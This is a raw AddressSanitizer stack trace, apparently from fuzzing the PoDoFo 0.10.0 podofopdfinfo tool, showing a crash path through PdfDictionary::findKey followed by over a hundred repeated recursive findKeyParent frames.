#0 0x4ab656 in __asan_memcpy /root/test/fuzzing_python/llvm-project-llvmorg-12.0.0/compiler-rt/lib/asan/asan_interceptors_memintrinsics.cpp:22:3
#1 0x700b6d in std::iterator_traits<std::_Rb_tree_const_iterator<PoDoFo::PdfObject*> >::difference_type std::distance<std::_Rb_tree_const_iterator<PoDoFo::PdfObject*> >(std::_Rb_tree_const_iterator<PoDoFo::PdfObject*>, std::_Rb_tree_const_iterator<PoDoFo::PdfObject*>) (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x700b6d)
#2 0x700660 in std::_Rb_tree_const_iterator<PoDoFo::PdfObject*> std::__lower_bound<std::_Rb_tree_const_iterator<PoDoFo::PdfObject*>, PoDoFo::PdfReference, __gnu_cxx::__ops::_Iter_comp_val<bool (*)(PoDoFo::PdfObject const*, PoDoFo::PdfReference const&)> >(std::_Rb_tree_const_iterator<PoDoFo::PdfObject*>, std::_Rb_tree_const_iterator<PoDoFo::PdfObject*>, PoDoFo::PdfReference const&, __gnu_cxx::__ops::_Iter_comp_val<bool (*)(PoDoFo::PdfObject const*, PoDoFo::PdfReference const&)>) (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x700660)
#3 0x6f55b9 in std::_Rb_tree_const_iterator<PoDoFo::PdfObject*> std::lower_bound<std::_Rb_tree_const_iterator<PoDoFo::PdfObject*>, PoDoFo::PdfReference, bool (*)(PoDoFo::PdfObject const*, PoDoFo::PdfReference const&)>(std::_Rb_tree_const_iterator<PoDoFo::PdfObject*>, std::_Rb_tree_const_iterator<PoDoFo::PdfObject*>, PoDoFo::PdfReference const&, bool (*)(PoDoFo::PdfObject const*, PoDoFo::PdfReference const&)) (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6f55b9)
#4 0x6ed816 in PoDoFo::PdfIndirectObjectList::GetObject(PoDoFo::PdfReference const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6ed816)
#5 0x563c8a in PoDoFo::PdfDataContainer::GetIndirectObject(PoDoFo::PdfReference const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x563c8a)
#6 0x6121e9 in PoDoFo::PdfDictionary::findKey(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6121e9)
#7 0x61238d in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x61238d)
#8 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#9 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#10 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#11 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#12 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#13 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#14 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#15 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#16 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#17 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#18 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#19 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#20 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#21 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#22 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#23 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#24 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#25 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#26 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#27 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#28 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#29 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#30 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#31 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#32 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#33 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#34 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#35 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#36 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#37 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#38 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#39 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#40 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#41 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#42 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#43 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#44 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#45 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#46 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#47 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#48 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#49 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#50 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#51 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#52 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#53 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#54 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#55 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#56 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#57 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#58 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#59 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#60 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#61 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#62 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#63 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#64 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#65 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#66 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#67 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#68 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#69 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#70 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#71 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#72 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#73 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#74 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#75 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#76 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#77 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#78 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#79 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#80 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#81 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#82 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#83 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#84 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#85 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#86 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#87 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#88 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#89 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#90 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#91 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#92 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#93 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#94 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#95 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#96 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#97 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#98 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#99 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#100 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#101 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#102 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#103 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#104 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#105 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#106 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#107 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#108 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#109 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#110 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#111 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#112 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#113 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#114 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#115 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#116 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#117 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#118 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#119 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#120 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#121 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#122 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#123 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#124 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#125 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#126 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#127 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#128 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#129 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#130 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#131 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#132 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#133 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#134 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#135 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#136 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#137 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#138 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
#139 0x6123e8 in PoDoFo::PdfDictionary::findKeyParent(std::basic_string_view<char, std::char_traits<char> > const&) const (/root/target/Invariants/podofo-0.10.0/build_clang/target/podofopdfinfo+0x6123e8)
